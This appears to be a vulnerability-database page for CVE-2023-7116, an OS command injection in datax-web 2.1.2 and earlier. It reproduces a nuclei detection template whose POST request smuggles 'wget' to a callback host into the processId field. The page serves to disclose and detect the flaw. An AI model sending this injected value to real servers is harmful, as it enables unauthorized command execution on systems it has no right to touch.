Lucene search
K

WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

WeiYe-Jing datax-web 2.1.2 has a medium severity OS command injection vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-7116
27 Dec 202317:27
circl
CNNVD
DataX-Web Operating System Command Injection Vulnerability
27 Dec 202300:00
cnnvd
CVE
CVE-2023-7116
27 Dec 202315:31
cve
Cvelist
CVE-2023-7116 WeiYe-Jing datax-web HTTP POST Request killJob os command injection
27 Dec 202315:31
cvelist
NVD
CVE-2023-7116
27 Dec 202316:15
nvd
Prion
Command injection
27 Dec 202316:15
prion
Positive Technologies
PT-2023-32884 · Weiye Jing · Datax-Web
27 Dec 202300:00
ptsecurity
SourceLink
vuldbwww.vuldb.com/
vuldbwww.vuldb.com/
id: CVE-2023-7116

info:
  name: WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection
  author: pussycat0x
  severity: medium
  description: |
    A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.
  impact: |
    Authenticated attackers with low privileges can inject and execute arbitrary OS commands via the processId parameter, potentially gaining full system access.
  remediation: |
    Update datax-web to a version newer than 2.1.2.
  reference:
    - https://vuldb.com/?ctiid.249086
    - https://vuldb.com/?id.249086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2023-7116
    cwe-id: CWE-78
    epss-score: 0.09901
    epss-percentile: 0.95
    cpe: cpe:2.3:a:datax-web_project:datax-web:2.1.2:*:*:*:*:*:*:*
  metadata:
    vendor: datax-web_project
    product: datax-web
  tags: cve,cve2023,datax-web,oast,rce,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "<title>Datax Web"
        internal: true

  - raw:
      - |
        POST /api/log/killJob HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {"processId":"1 & wget http://{{interactsh-url}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c294e5fc46208062d4f7976a4e828250bf1e0ee7541df6f3ebd4cc7cf11918f1022100b204f08f1b100c83dea2f165e0a7a5238b540731de6be8f0351d696ed56f82b2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.3 - 9.8
CVSS 26.5
CVSS 36.3
EPSS0.09901
13